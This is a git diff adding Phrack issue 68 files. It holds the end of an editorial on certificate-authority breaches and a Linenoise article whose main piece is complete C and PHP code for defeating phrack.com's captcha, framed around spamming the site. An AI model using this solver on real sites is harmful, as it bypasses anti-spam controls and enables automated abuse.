+ourselves limited to Google+ and Facebook.
+
+At the same time, the additional protections we have come to rely on prove
+to be as bad as we always thought they might be. When breaking into a
+certificate authority is as easy as it was with DigiNotar [7], when the
+database of Comodo [8] ends up in BitTorrents, we are facing bigger
+challenges than ever before. There are various discussions all over the net
+on how to deal with the mess that is our common PKI.  From the IETF [9] to
+nation states, everyone has their own ideas. When certificate authorities
+are taken over by governments or forced to issue Sub-CA certificates to the
+same [10], it's not a trust mechanism we shall rely on.
+
+An attitude that this is someone else's problem doesn't help. As more and
+more functions of daily life move online, everyone is exposed to these
+problems. Even if you know how to spot certificate changes, you will still
+need to access the web site. HTTPS doesn't provide a plan B option. The CA
+nightmare calls for the gifted and smart people to work together and find a
+long term dependable solution. This is the time where your talent, skills
+and experience is required, unless you are fine with government and vendor
+driven committees to "solve" it.
+
+Meanwhile over at IRC's little pre-teen sister Twitter, whose attention
+span is shorter than that of a fruit fly and easily bought, people hype
+so-called solutions [11] to the problem without doubts.  Although their
+heros abandon privacy solutions people depend on the moment someone waves a
+little money in their face [12], the masses rather believe in a savior than
+to think and evaluate for themselves.  Are you one of them?
+
+Unquestioned believe becomes the new normal. Whether it is Google or Apple
+fanboyism, the companies can do whatever they want. Apple ships products
+with several year old vulnerabilities [13] in open source components they
+reused and nobody notices. Everyone can make X.509 certificates that iPhone
+and iPad will happily accept [14]? No problem.  Think back and consider the
+shit storm if that would have been Microsoft. These companies feel so
+invincible that Apple's App Store Guidelines [15] openly state: "If you run
+to the press and trash us, it never helps."
+Critical thinking seems to become a challenge when you get what you want.
+Just look at how many hackers use Gmail without any end-to-end encryption,
+because it just works. Thich hacker using a hotmail email address was ever
+taken serious? Where is the difference?
+
+What Apple and Google are for the hip generation, Symantec is for
+governments and corporations. They are seen as the one company that will
+protect us all. When the source code of PCAnywhere is leaked [16] and the
+same company simply advises its users to no longer use that software
+product [16], you get an idea of how they evaluate the security of it
+themselves. And what about all the systems in daily life that depend on it?
+If nobody used PCAnywhere, Symantec would have stopped selling it long ago.
+Therefore, they simply left a large user base out in the cold.  And what
+happens? Nothing. Except, maybe, that some have fun with various remote
+access points.
+
+It all comes down to knowledge. Knowledge cannot be obtained by believe.
+Believe is a really bad substitute for actually knowing. And what is the
+hacker community other than first and foremost the quest for knowledge that
+you found out yourself by critically questioning everything put in front of
+you. What you do with that knowledge is a question everyone has to answer
+himself. But if we stop to learn, experiment and play, we stop being
+hackers and become part of the masses. It is a sign of the times when only
+very few hackers speak IPv6, leave alone use it. When you see more fuzzers
+written than lines of code actually read, because coding up a simple
+trash-generator is so much easier than actually understanding what the code
+does and then precisely exploiting it.
+
+The quest for knowledge defines us, not money or fame. Let's keep it up!
+
+
+[1] https://en.wikipedia.org/wiki/Arab_spring
+[2] https://en.wikipedia.org/wiki/2011%E2%80%932012_Syrian_uprising
+[3] http://buggedplanet.info/index.php?title=EG
+[4] https://en.wikipedia.org/wiki/Telecommunications_data_retention
+[5] https://en.wikipedia.org/wiki/Three_strikes_%28policy%29
+[6] http://www.wired.com/threatlevel/2012/02/peter-sunde/
+[7] https://en.wikipedia.org/wiki/DigiNotar
+[8] https://en.wikipedia.org/wiki/Comodo_Group#Breach_of_security
+[9] http://www.ietf.org/mail-archive/web/therightkey/current/maillist.html
+[10] https://bugzilla.mozilla.org/show_bug.cgi?id=724929
+[11] https://en.wikipedia.org/wiki/Convergence_%28SSL%29
+[12] https://en.wikipedia.org/wiki/Whisper_Systems#Acquisition_by_Twitter
+[13] http://support.apple.com/kb/HT5005
+[14] http://support.apple.com/kb/HT4824
+[15] https://developer.apple.com/appstore/guidelines.html
+[16] http://resources.infosecinstitute.com/pcanywhere-leaked-source-code/
+[17] http://www.symantec.com/connect/sites/default/files/pcAnywhere
+     %20Security%20Recommendations%20WP_01_23_Final.pdf
+
+
+[ EOF ]
diff --git a/phrack68/4.txt b/phrack68/4.txt
new file mode 100644
index 0000000..e1261f4
--- /dev/null
+++ b/phrack68/4.txt
@@ -0,0 +1,3309 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x04 of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=-----------------------=[  L I N E N O I S E  ]=-----------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------------=[     various     ]=-------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+Linenoise iz back! The last one was in Issue 0x3f (2005 ffs) and since we
+had great short and sweet submissions we thought it was about time to
+resurrect it. After all, "a strong linenoise is key" ;-)
+
+So, dear hacker, enjoy a strong Linenoise.
+
+
+--[ Contents
+
+    1 - Spamming PHRACK for fun and profit                 -- darkjoker
+    2 - The Dangers of Anonymous Email                     -- DangerMouse
+    3 - Captchas Round 2                                   -- PHRACK PHP
+                                                              CoderZ Team
+    4 - XSS Using NBNS on a Home Router                    -- Simon Weber
+    5 - Hacking the Second Life Viewer For Fun and Profit  -- Eva
+    6 - How I misunderstood digital radio                  -- M.Laphroaig
+    7 - The 1130 Guide to Growing High-Quality Cannabis    -- 1130
+
+
+|=[ 0x01 ]=---=[ Spamming PHRACK for fun & profit - darkjoker ]=---------=|
+
+In this paper I'd like to explain how a captcha can be bypassed without
+problems with just a few lines of C.  First of all we'll pick a captcha to
+bypass, and, of course, is there any better captcha than the one of this
+site?  Of course not, so we'll take it as example.  You may have noticed
+that there are many different spam messages in the comments of the
+articles, which means that probably someone else has already bypassed the
+captcha but, instead of writing an article about it, decided to spend his
+time posting spam all around the site.  Well, I hope that this article will
+also be taken into account to make the decision to change captcha, because
+this one is really weak.
+
+First of all we're going to download some captchas, so that we'll be able
+to teach our bot how to recognise a random captcha.  In order to download
+some captchas i've written this PHP code:
+
+<?php
+mkdir ("images");
+for ($i=0;$i<200;$i++)
+   file_put_contents ("images/{$i}.jpg",file_get_contents
+                  ("http://www.phrack.com/captcha.php"));
+?>
+
+We're downloading 200 captchas, which should be enought.  Ok, once we'll
+have downloaded all the images we can proceed, cleaning the images (which
+means we're going to remove the "noise".  In these captchas the noise is
+just made of some pixel of a lighter blue than the one used to draw the
+letters.  Well, it's kind of a mess to work with JPEG images, so we'll
+convert all the images in PPM, which will make our work easier.
+
+Luckily under Linux there's a command which makes the conversion really
+easy and we won't need to do it manually:
+
+convert -compress None input.jpg output.ppm
+
+Let's do it for every image we have:
+
+<?php
+mkdir ("ppm");
+for ($i=0;$i<200;$i++)
+   system ("convert -compress None images/{$i}.jpg ppm/{$i}.ppm");
+?>
+
+Perfect, now we have everything we need to proceed.  Now, as I said
+earlier, we've to remove the noise.  That's a function which will load an
+image and then removes the noise:
+
+void load_image (int v) {
+   char img[32],line[1024];
+   int n,i,d,k,l,s;
+   FILE *fp;
+   sprintf (img, "ppm/%d.ppm",v);
+   fp = fopen (img, "r");
+   do
+      fgets (line, sizeof(line),fp);
+   while (strcmp (line, "255\n"));
+   i=0;
+   d=0;
+   k=0;
+   int cnt=0;
+   while (i!=40) {
+      fscanf (fp,"%d",&n);
+      captcha[i][d][k]=(char)n;
+      k++;
+      if (k==3) {
+         k=0;
+         if (d<119)
+            d++;
+         else {
+            i++;
+            d=0;
+         }
+      }
+   }
+}
+
+Ok, this piece of code will load an image into 'captcha', which is a 3
+dimensional array (rows*cols*3 bytes per color).  Once the array is loaded,
+using clear_noise () (written below) the noise will be removed.
+
+void clear_noise () {
+   int i,d,k,t,ti,td;
+   char n[3];
+   /* The borders are always white */
+   for (i=0;i<40;i++)
+      for (k=0;k<3;k++) {
+         captcha[i][0][k]=255;
+         captcha[i][119][k]=255;
+      }
+   for (d=0;d<120;d++)
+      for (k=0;k<3;k++) {
+         captcha[0][d][k]=255;
+         captcha[39][d][k]=255;
+      }
+   /* Starts removing the noise */
+   for (i=0;i<40;i++)
+      for (d=0;d<120;d++)
+         if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
+             captcha[i][d][2]>__COL)
+            for (k=0;k<3;k++)
+               captcha[i][d][k]=255;
+   for (i=1;i<39;i++) {
+      for (d=1;d<119;d++) {
+         for (k=0,t=0;k<3;k++)
+            if (captcha[i][d][k]!=255)
+               t=1;
+         if (t) {
+            ti=i-1;
+            td=d-1;
+            for (k=0,t=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            td++;
+            for (k=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            td++;
+            for (k=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            td=d-1;
+            ti=i;
+            for (k=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            td+=2;
+            for (k=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            td=d-1;
+            ti=i+1;
+            for (k=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            td++;
+            for (k=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            td++;
+            for (k=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            if (t/3<=__MIN)
+               for (k=0;k<3;k++)
+                  captcha[i][d][k]=255;
+         }
+      }
+   }
+}
+
+Well, what does this function do? It's really easy, first of all it clears
+all the borders (because we know by looking at the downloaded images that
+the borders never contain any character).  Once the borders are cleaned,
+the second part of the routine will remove all the light blue pixels,
+turning them into white pixels.  This way we'll obtain an almost perfect
+image.  The only issue is that there are some pixels which are as dark as
+the ones which composes the characters, so we can't remove them with the
+method explained above, we'll have to create something new.  My idea was to
+"delete" all the pixels which have no blue pixels near them, so that the
+few blue pixels which doesn't compose the letters will be deleted.  In
+order to make the image cleaner I decided to delete all the pixels which
+doesn't have at least 3 pixels near them.  You may have noticed that __COL
+and __MIN are not defined in the source above, these are two numbers:
+
+#define   __COL   0x50
+#define   __MIN   4*3
+
+__COL is a number I used when I delete all the light blue pixels, I use it
+in this line:
+
+if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
+    captcha[i][d][2]>__COL)
+
+In a few words, if the pixel is lighter than #505050 then it will be
+deleted (turned white). __MIN is the minimum number of conterminous pixels
+under which the pixel is deleted.  The values where obtained after a few
+attempts.
+
+Perfect, now we have a piece of code which loads and clears a captcha.  Our
+next goal is to split the characters so that we'll be able to recognise
+each of them. Before doing all this work we'd better start working with 2
+dimensional arrays, it'll make our work easier, so I've written some lines
+which makes this happen:
+
+void make_bw () {
+   int i,d;
+   for (i=0;i<40;i++)
+      for (d=0;d<120;d++)
+         if (captcha[i][d][0]!=255)
+            bw[i][d]=1;
+         else
+            bw[i][d]=0;
+}
+
+This simply transforms the image in a black and white one, so that we can
+use a 2 dimensional array.  Now we can proceed splitting the letters.
+In order to get the letters divided we are supposed to obtain two pixels
+whose coordinates are the ones of the upper left corner and the lower right
+corner. Once we have the coordinates of these two corners we'll be able to
+cut a rectangle which contains a character.
+
+Well, we're going to begin scanning the image from the left to the right,
+column by column, and every time we'll find a black pixels in a column
+which is preceded by an entire-white column, we'll know that in that column
+a new character begins, while when we'll find an entire-white column
+preceded by a column which contains at least one black pixel we'll know
+that a character ends there.
+
+Now, after this procedure is done we should have 12 different numbers which
+represents the columns where each character begins and ends.  The next step
+is to find the rows where the letter begins and ends, so that we can obtain
+the coordinates of the pixels we need.  Let's call the column where the Xth
+character begins CbX and the column where the Xth character ends CeX.  Now
+we'll start our scan from the top to the bottom of the image to find the
+upper coordinate and from the bottom to the top to find the lower
+coordinate.
+
+This time, of course, the scan will be done six times using as limits the
+columns where each character is contained between.
+
+When the first row which contains a pixel is found (let's call this row
+RbX) the same thing will be done to find the lower coordinate. The only
+difference will be that the scan will begin from the bottom, that's done
+this way because some characters (such as the 'j') are divided into two
+parts, and if the scan was done only from the bottom to the end the result
+would have been just a dot instead of the whole letter.
+
+After having scanned the image from the bottom to the top we'll have
+another row where the letter ends (or begins from the bottom), we'll call
+this row ReX (of course we're talking about the Xth character).
+
+Now we know which are the horizontal and vertical coordinates of the two
+corners we're interested in (which are C1X(CbX,RbX) and C2X(CeX,ReX)), so
+we can procede by filling a (CeX-CbX)*(ReX-RbX) matrix which will contain
+the Xth character. Obviously the matrix will be filled with the bits of the
+Xth character.
+
+void scan () {
+   int i,d,k,j,c,coord[6][2][2];
+   for (d=0,j=0,c=0;d<120;d++) {
+      for (i=0,k=0;i<40;i++)
+         if (bw[i][d])
+            k=1;
+      if (k && !j) {
+         j=1;
+         coord[c][0][0]=d;
+      }
+      else if (!k && j) {
+         j=0;
+         coord[c++][0][1]=d;
+      }
+   }
+   for (c=0;c<6;c++) {
+      coord[c][1][0]=-1;
+      coord[c][1][1]=-1;
+      for (i=0;(i<40 && coord[c][1][0]==-1);i++)
+         for (d=coord[c][0][0];d<coord[c][0][1];d++)
+            if (bw[i][d]) {
+               coord[c][1][0]=i;
+               break;
+            }
+      for (i=39;(i>=0 && coord[c][1][1]==-1);i--)
+         for (d=coord[c][0][0];d<coord[c][0][1];d++)
+            if (bw[i][d]) {
+               coord[c][1][1]=i;
+               break;
+            }
+      for (i=coord[c][1][0],j=0;i<=coord[c][1][1];i++,j++)
+         for (d=coord[c][0][0],k=0;d<coord[c][0][1];d++,k++)
+            chars[c][j][k]=bw[i][d];
+      dim[c][0]=j;
+      dim[c][1]=k;
+   }
+}
+
+Ok, now, using this function we're going to obtain all the characters
+splitted into an array of 2 dimension arrays.  The next step will be the
+most boring, because we're going to divide all the characters by hand, so
+that the program, after our work, will be able to recognise all of them and
+learn how each character is made.  Before that, we need a new directory
+which will contain all the characters.  A simple 'mkdir chars' will do.
+Now we have to fill the directory with the characters.  Here's a main
+function whose goal is to divide all the captchas into characters and put
+them in the chars/ directory.
+
+int main () {
+   int i,d,k,c,n;
+   FILE *x;
+   char path[32];
+   for (n=0,k=0;n<200;n++) {
+      load_image (n);
+      clear_noise ();
+      make_bw ();
+      scan ();
+      for (c=0;c<6;c++,k++) {
+         sprintf (path,"chars/%d.ppm",k);
+         x=fopen (path,"w");
+         fprintf (x,"P1\n#asdasd\n\n%d %d\n",dim[c][1],dim[c][0]);
+         for (i=0;i<dim[c][0];i++) {
+            for (d=0;d<dim[c][1];d++)
+               fprintf (x,"%d",chars[c][i][d]);
+            fprintf (x,"\n");
+         }
+         fclose (x);
+      }
+   }
+   return 0;
+}
+
+Very well, now the chars/ directory contains all the files we need.  Now it
+comes the part where the human is supposed to divide the characters in the
+right directories.  To make this work faster I've used a simple PHP script
+which helps a little:
+
+<?php
+$in=fopen ("php://stdin","r");
+mkdir ("c");
+for ($i=0;$i<26;$i++)
+   mkdir ("c/".chr(ord('a')+$i));
+for ($i=0;$i<10;$i++)
+   mkdir ("c/".chr(ord('0')+$i));
+for ($i=54;$i<1200;$i++) {
+   echo $i.": ";
+   $a = trim(fgets ($in,1024));
+   if ($a!='.')
+      system ("cp chars/{$i}.ppm c/{$a}/{$i}.ppm");
+}
+fclose ($in);
+?>
+
+I think there's nothing to be explained, it's just a few lines of code.
+After the script is runned and someone (me) enters all the data needed
+we're going to have a c/ directory with some subdirectories in which there
+are all the characters divided.
+
+Some characters ('a','e','i','o','u','l','0','1') never appear, which means
+that probably the author of the captcha decided not to include these
+characters.
+
+Anyway that's not a problem for us.  Now, we should work out a way to make
+our program recognise a character.  My idea was to divide the image in 4
+parts (horizontally), and then count the number of black (1) pixels in each
+part, so that when we have an unknown character all our program will be
+supposed to do is to count the number of black pixels for each part of the
+image, and then search the character with the closest number of black
+pixels.  I've tried to do it but I haven't kept into account that some
+characters (such as 'q' and 'p') have a similar number of pixels for each
+part, even though they're completely different.
+
+After having realised that, I decided to use 8 parts to divide each
+character: 4 parts horizontally, then each part is divided in other 2 parts
+vertically.
+
+Well, of course there's no way I could have done that by hand, and in fact
+I've written a PHP script:
+
+<?php
+error_reporting (E_ALL ^ E_NOTICE);
+$f = array (4,2,4/3,1);
+$arr=array ('b','c','d','f','g','h','j','k','m','n','p','q','r','s','t',
+            'v','w','x','y','z','2','3','4','5','6','7','8','9');
+$h = array ();
+for ($a=0;$a<count($arr);$a++) {
+   $i = $arr[$a];
+   $x = array ();
+   $files = scandir ("c/{$i}");
+   for ($d=0;$d<count($files);$d++) {
+      if ($files[$d][0]!='.') { // Excludes '.' and '..'
+         $lines=explode ("\n",file_get_contents ("c/{$i}/{$files[$d]}"));
+         for ($k=0;$k<4;$k++)
+            array_shift ($lines);
+         array_pop ($lines);
+         $j = count ($lines);
+         $k = strlen ($lines[0]);
+         $r=0;
+         $h[$a] += $j;
+         if ($files[$d]=="985.ppm") {
+         for ($n=0;$n<4;$n++)
+            for (;$r<floor ($j/$f[$n]);$r++) {
+               for ($l=0;$l<floor($k/2);$l++)
+                  $x[$n][0]+=$lines[$r][$l];
+               for (;$l<floor($k);$l++)
+                  $x[$n][1]+=$lines[$r][$l];
+            }
+         print_r ($x);
+         }
+      }
+   }
+   $h [$a] = round ($h[$a]/(count($files)-2));
+   for ($n=0;$n<4;$n++) {
+      $x[$n][0] = round ($x[$n][0]/(count($files)-2));
+      $x[$n][1] = round ($x[$n][1]/(count($files)-2));
+   }
+   printf ("$i => %02d %02d %02d %02d / %02d %02d %02d %02d\n",$x[0][0],
+           $x[1][0],$x[2][0],$x[3][0],$x[0][1],$x[1][1],$x[2][1],$x[3][1]);
+}
+for ($i=0;$i<count ($arr);$i++)
+   echo "{$h[$i]}, ";
+
+?>
+
+It works out the average number of black pixels for each part.  Moreover it
+also prints the average height of each character (I'm going to explain the
+reason of this below).
+
+A character such as a 'z' is divided this way:
+
+01111  111110
+11111  111111
+11111  111111
+01111  111111
+
+00000  111110
+00000  111110
+00000  111100
+00001  111100
+
+00001  111000
+00011  110000
+00011  110000
+00111  100000
+
+00111  111110
+01111  111111
+01111  111111
+00111  111110
+
+So the numbers (of the black pixels) in this case will be:
+
+18 23
+ 1 18
+ 8  8
+14 22
+
+Well, once taken all these numbers from each character the PHP script
+written above works out the average numbers for each character.  In the
+'z', for example, the average numbers are:
+
+18 20
+ 3 15
+11  7
+17 20
+
+Which are really close to the ones written above (at least, they're closer
+than the ones of the other characters).  Now the last step is to do the
+comparison between the character of the captcha we want our program to read
+and the numbers we've stored.  To do so we first need to make the program
+count the number of black pixels of a character, and save the numbers
+somewhere so that it'll be possible to do the comparison.  read_pixels ()'s
+aim is exactly to do that, using the same method used above in the PHP
+script.
+
+void read_pixels (int c) {
+   int i,d,k,r;
+   float arr[]={4,2,1.333333,1};
+   memset (bpix,0,8*sizeof(int));
+   for (k=0,i=0;k<4;k++) {
+      for (;i<(int)(dim[c][0]/arr[k]);i++) {
+         for (d=0;d<dim[c][1]/2;d++)
+            bpix[k][0] += chars[c][i][d];
+         for (;d<dim[c][1];d++)
+            bpix[k][1] += chars[c][i][d];
+      }
+   }
+}
+
+The next step is to compare the numbers, that's what the cmp () function is
+supposed to do:
+
+char cmp (int c) {
+   int i,d;
+   int err,n,min,min_i;
+   read_pixels (c);
+   for (i=0,min=-1;i<28;i++) {
+      n=abs(heights[i]-dim[c][0])*__HGT;
+      for (d=0;d<4;d++) {
+         n += abs(bpix[d][0]-table[i][0][d]);
+         n += abs(bpix[d][1]-table[i][1][d]);
+      }
+      if (min>n || min<0) {
+         min=n;
+         min_i = i;
+      }
+   }
+   return ch_list[min_i];
+}
+
+'table' is an array in which all the average numbers worked out before are
+stored.  As you can see there's a final number (n) which is the sum of a
+number obtain in this way:
+
+n += |x-y)
+
+Where 'x' is the number of black pixels of each part of the character we
+want to read, while 'y' is the average number of the character we're
+comparing the character we want to read with.  The smaller the resulting
+number is, the closer to that character.  I firstly thought that the
+algorithm I used would have been good enough, but I soon realised that
+there were too many "misunderstandings" while the program was trying to
+read some characters (such as the 'y's, which were usually read as 'v's).
+So I decided to make the final number also influenced by the height of the
+character, so that a 'v' and a 'y' (which have different heights) can't be
+misunderstood.
+
+Before this change the program couldn't recognise 17 characters out of
+1200.  Then, after some tests, I found that by adding the difference of the
+heights times a costant, the results were better: 3 wrong characters out of
+1200.
+
+n = |x-y|*k
+
+Where 'x' is the height of the character we want to read while 'y' is the
+height of the character we're comparing the character we want to read
+with.
+
+The costant (k) was calculated by doing some attempts, and finally it was
+given the value 1.5.  Now everything's ready, the last function I've
+written is read_captcha () which will return the captcha's string.
+
+char *read_captcha (char *file) {
+   char *str;
+   int i;
+   str = malloc(7*sizeof(char));
+   load_image (file);
+   clear_noise ();
+   make_bw ();
+   scan ();
+   for (i=0;i<6;i++)
+      str[i]=cmp(i);
+   str[i]=0;
+   return str;
+}
+
+And.. Done :) Now we can make our program read a captcha without any
+problem.  Now I should be supposed to code an entire spam bot, but, since
+it requires some tests I think it wouldn't be good to post random comments
+all around phrack, so my article finishes here.
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#define   __COL   80
+#define   __MIN   4*3
+#define   __HGT   1.5
+
+unsigned char captcha[40][120][3];
+unsigned char bw[40][120];
+unsigned char chars[6][40][30];
+int dim[6][2];
+int bpix[4][2];
+int heights[] = {
+      23, 16, 23, 23, 22, 23, 29,
+      23, 16, 16, 22, 22, 16, 16,
+      20, 16, 16, 16, 21, 16, 23,
+      24, 23, 23, 23, 23, 24, 24 };
+char ch_list [] = "bcdfghjkmnpqrstvwxyz23456789";
+int table [28][2][4]= {
+         { {18, 28, 26, 28}, { 0, 20, 25, 29}},
+         { {10, 17, 17, 10}, {21,  1,  1, 20}},
+         { { 0, 20, 25, 29}, {18, 31, 26, 31}},
+         { {10, 24, 18, 17}, {23, 12,  6,  5}},
+         { {21, 25, 20,  8}, {28, 25, 29, 27}},
+         { {18, 28, 25, 22}, { 0, 20, 25, 22}},
+         { { 1,  9,  0, 14}, {13, 27, 28, 25}},
+         { {18, 24, 30, 22}, { 0, 15, 21, 23}},
+         { {24, 21, 20, 17}, {21, 25, 24, 20}},
+         { {17, 18, 16, 14}, {20, 17, 16, 14}},
+         { {27, 25, 29, 22}, {24, 25, 25,  0}},
+         { {25, 25, 24,  0}, {27, 25, 29, 22}},
+         { {14, 16, 15, 13}, {19,  2,  0,  0}},
+         { {15, 16,  2,  9}, {12,  4, 18, 17}},
+         { {15, 20, 15, 12}, { 5, 10,  5, 19}},
+         { {13, 17, 15, 11}, {14, 14, 14, 10}},
+         { { 9, 17, 20, 13}, {12, 18, 22, 14}},
+         { { 9, 11, 11, 13}, {12, 13, 13, 12}},
+         { {15, 19, 14, 14}, {16, 20, 15,  9}},
+         { {18,  3, 11, 17}, {20, 15,  7, 20}},
+         { {21,  4,  8, 24}, {21, 26, 19, 24}},
+         { {16,  0,  6, 24}, {29, 23, 25, 28}},
+         { { 5, 12, 23,  5}, {23, 24, 32, 24}},
+         { {23, 25, 10, 20}, {18, 12, 26, 23}},
+         { { 3, 21, 28, 24}, {16, 15, 30, 27}},
+         { {18,  1, 11, 20}, {27, 24, 14,  3}},
+         { {25, 24, 26, 23}, {28, 26, 28, 28}},
+         { {20, 27, 16, 16}, {25, 26, 28,  9}} };
+
+void clear () {
+   int i,d,k;
+   for (i=0;i<40;i++)
+      for (d=0;d<120;d++)
+         for (k=0;k<3;k++)
+            captcha[i][d][k]=0;
+   for (i=0;i<40;i++)
+      for (d=0;d<120;d++)
+         bw[i][d]=0;
+   for (i=0;i<6;i++)
+      for (d=0;d<40;d++)
+         for (k=0;k<30;k++)
+            chars[i][d][k]=0;
+   for (i=0;i<6;i++)
+      for (d=0;d<2;d++)
+         dim[i][d]=0;
+}
+
+int numlen (int n) {
+   char x[16];
+   sprintf (x,"%d",n);
+   return strlen(x);
+}
+
+void load_image (char *img) {
+   char line[1024];
+   int n,i,d,k,l,s;
+   FILE *fp;
+   fp = fopen (img, "r");
+   do
+      fgets (line, sizeof(line),fp);
+   while (strcmp (line, "255\n"));
+   i=0;
+   d=0;
+   k=0;
+   int cnt=0;
+   while (i!=40) {
+      fscanf (fp,"%d",&n);
+      captcha[i][d][k]=(char)n;
+      k++;
+      if (k==3) {
+         k=0;
+         if (d<119)
+            d++;
+         else {
+            i++;
+            d=0;
+         }
+      }
+   }
+}
+
+void clear_noise () {
+   int i,d,k,t,ti,td;
+   char n[3];
+   /* The borders are always white */
+   for (i=0;i<40;i++)
+      for (k=0;k<3;k++) {
+         captcha[i][0][k]=255;
+         captcha[i][119][k]=255;
+      }
+   for (d=0;d<120;d++)
+      for (k=0;k<3;k++) {
+         captcha[0][d][k]=255;
+         captcha[39][d][k]=255;
+      }
+   /* Starts removing the noise */
+   for (i=0;i<40;i++)
+      for (d=0;d<120;d++)
+         if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
+             captcha[i][d][2]>__COL)
+            for (k=0;k<3;k++)
+               captcha[i][d][k]=255;
+   for (i=1;i<39;i++) {
+      for (d=1;d<119;d++) {
+         for (k=0,t=0;k<3;k++)
+            if (captcha[i][d][k]!=255)
+               t=1;
+         if (t) {
+            ti=i-1;
+            td=d-1;
+            for (k=0,t=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            td++;
+            for (k=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            td++;
+            for (k=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            td=d-1;
+            ti=i;
+            for (k=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            td+=2;
+            for (k=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            td=d-1;
+            ti=i+1;
+            for (k=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            td++;
+            for (k=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            td++;
+            for (k=0;k<3;k++)
+               if (captcha[ti][td][k]!=255)
+                  t++;
+            if (t<__MIN)
+               for (k=0;k<3;k++)
+                  captcha[i][d][k]=255;
+         }
+      }
+   }
+}
+
+void make_bw () {
+   int i,d;
+   for (i=0;i<40;i++)
+      for (d=0;d<120;d++)
+         if (captcha[i][d][0]!=255)
+            bw[i][d]=1;
+         else
+            bw[i][d]=0;
+}
+
+void scan () {
+   int i,d,k,j,c,coord[6][2][2];
+   for (d=0,j=0,c=0;d<120;d++) {
+      for (i=0,k=0;i<40;i++)
+         if (bw[i][d])
+            k=1;
+      if (k && !j) {
+         j=1;
+         coord[c][0][0]=d;
+      }
+      else if (!k && j) {
+         j=0;
+         coord[c++][0][1]=d;
+      }
+   }
+   for (c=0;c<6;c++) {
+      coord[c][1][0]=-1;
+      coord[c][1][1]=-1;
+      for (i=0;(i<40 && coord[c][1][0]==-1);i++)
+         for (d=coord[c][0][0];d<coord[c][0][1];d++)
+            if (bw[i][d]) {
+               coord[c][1][0]=i;
+               break;
+            }
+      for (i=39;(i>=0 && coord[c][1][1]==-1);i--)
+         for (d=coord[c][0][0];d<coord[c][0][1];d++)
+            if (bw[i][d]) {
+               coord[c][1][1]=i;
+               break;
+            }
+      for (i=coord[c][1][0],j=0;i<=coord[c][1][1];i++,j++)
+         for (d=coord[c][0][0],k=0;d<coord[c][0][1];d++,k++)
+            chars[c][j][k]=bw[i][d];
+      dim[c][0]=j;
+      dim[c][1]=k;
+   }
+}
+
+void read_pixels (int c) {
+   int i,d,k,r;
+   float arr[]={4,2,1.333333,1};
+   memset (bpix,0,8*sizeof(int));
+   for (k=0,i=0;k<4;k++) {
+      for (;i<(int)(dim[c][0]/arr[k]);i++) {
+         for (d=0;d<(int)(dim[c][1]/2);d++)
+            bpix[k][0] += chars[c][i][d];
+         for (;d<dim[c][1];d++)
+            bpix[k][1] += chars[c][i][d];
+      }
+   }
+}
+
+char cmp (int c) {
+   int i,d;
+   int err,n,min,min_i;
+   read_pixels (c);
+   for (i=0,min=-1;i<28;i++) {
+      n=abs(heights[i]-dim[c][0])*__HGT;
+      for (d=0;d<4;d++) {
+         n += abs(bpix[d][0]-table[i][0][d]);
+         n += abs(bpix[d][1]-table[i][1][d]);
+      }
+      if (min>n || min<0) {
+         min=n;
+         min_i = i;
+      }
+   }
+   return ch_list[min_i];
+}
+
+char *read_captcha (char *file) {
+   char *str;
+   int i;
+   str = malloc(7*sizeof(char));
+   load_image (file);
+   clear_noise ();
+   make_bw ();
+   scan ();
+   for (i=0;i<6;i++)
+      str[i]=cmp(i);
+   str[i]=0;
+   return str;
+}
+
+int main (int argc, char *argv[]) {
+   printf ("%s\n",read_captcha ("test.ppm"));
+   return 0;
+}
+
+Oh, if you want to have some fun and the staff is so kind as to leave
+captcha.php (now captcha_old.php) you can run this PHP script:
+
+<?
+file_put_contents ("a.jpg",file_get_contents
+   ("http://www.phrack.com/captcha_old.php"));
+system ("convert -compress None a.jpg test.ppm");
+system ("./captcha");
+?>
+
+I'm done, thanks for reading :)!
+
+               darkjoker - darkjoker93 _at_ gmail.com
+
+
+|=[ 0x02 ]=---=[ The Dangers of Anonymous Email - DangerMouse ]=---------=|
+
+
+In this digital world of online banking, and cyber relationships there
+exists an epidemic. This is known simply as SPAM.
+The war on spam has been costly, with casualties on both sides. However
+finally mankind has developed the ultimate weapon to win the war...
+email anonymizers!
+
+Ok, so maybe this was a bit dramatic, but the truth is people are
+getting desperate to rid themselves of the gigantic volumes of
+unsolicited email which plagues their inbox daily. To combat this problem
+many internet users are turning to email anonymizing services such as
+Mailinator [1].
+
+Sites like mailinator.com provide a domain where any keyword can be
+created and appended as the username portion of an email address.
+So for example, if you were to choose the username "trustno1", the email
+address trustno1@mailinator.com could be used. Then the mailbox can be
+accessed without a password at http://trustno1.mailinator.com. There is
+no registration required to do this, and the email address can be created
+at a whim. Obviously this can be used for a number of things. From a
+hackers perspective, it can be very useful to quickly create an anonymous
+email address whenever one is needed. Especially one which can be checked
+easily via a chain of proxies. Hell, combine it with an anonymous visa
+gift card, and you've practically got a new identity.
+
+For your typical spam adverse user, this can be an easy way to avoid
+dealing with spam. One of the easiest ways to quickly gain an inbox
